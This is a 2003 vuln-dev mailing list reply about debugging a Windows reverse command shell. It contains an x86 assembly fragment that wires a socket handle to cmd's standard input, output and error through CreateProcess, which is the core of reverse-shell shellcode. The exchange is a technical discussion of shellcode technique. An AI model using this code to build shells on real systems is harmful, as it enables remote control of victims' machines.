Vulnerability Development mailing list archives
Re: Windows reverse Shell
From: "sk" <sk () scan-associates net>
Date: Wed, 5 Feb 2003 00:42:54 +0800
If I remember correctly, that shellcode dont have "bind" function. A reverse connect shellcode dont need "bind". WSASocket() will return a non-overlapping socket, so it can be used as in/out/err handler in CreateProcess(), there is really nothing extra you need to do. Since you got a connection in your nc, the problem should be in your CreateProcess(). Try to check if your StartupInfo flags has STARTF_USESTDHANDLES. I dont have C code for this, but in asm, it could be something like this: ;ebx = socket xor ecx,ecx mov cl,11h push edi mov edi,ebp rep stos dword ptr [edi] ;zero up startupinfo pop edi mov byte ptr [ebp],44h ;STARTUPINFO size mov dword ptr [ebp+3Ch],ebx ;output handler mov dword ptr [ebp+38h],ebx ;input handler mov dword ptr [ebp+40h],ebx ;error handler mov word ptr [ebp+2Ch],0101h ;STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW lea eax,[ebp+44h] push eax push ebp push ecx push ecx push ecx inc ecx push ecx dec ecx push ecx push ecx push esi ;"cmd",0 push ecx call dword ptr [edi-28] ;CreateProcess sk ----- Original Message ----- From: "NetNinja" <netninja () hotmail kg> To: <vuln-dev () securityfocus com> Sent: Tuesday, February 04, 2003 3:37 AM Subject: Windows reverse Shell
Hello guys, David Litchfield in his Blackhat talk, talked about using socket handle from WSASocket() and pass that handle as a parameter to stdin, stdout and stderr for CreateProcess function. By doin this way his reverse cmd shellcode becomes much smaller. I tried coding that reverse command shell in C, but couldnt get it to work. It simply connects to my listening netcat listener and then disconnects. David Litchfield used 4 functions to achieva that WSASocket, bind, connect and CreateProcess. A lil help would b appreciated on building this reverse cmd shell. thanx. -- Best regards, Adik mailto:netninja () hotmail kg
Current thread:
- Windows reverse Shell NetNinja (Feb 03)
- Re: Windows reverse Shell 3APA3A (Feb 05)
- Re[2]: Windows reverse Shell Adik (Feb 05)
- Re[2]: Windows reverse Shell 3APA3A (Feb 05)
- Re: Windows reverse Shell sk (Feb 05)
- <Possible follow-ups>
- Re: Windows reverse Shell Ali Saifullah Khan (Feb 05)
- Re: Windows reverse Shell Berend-Jan Wever (Feb 05)
- Re: Windows reverse Shell 3APA3A (Feb 05)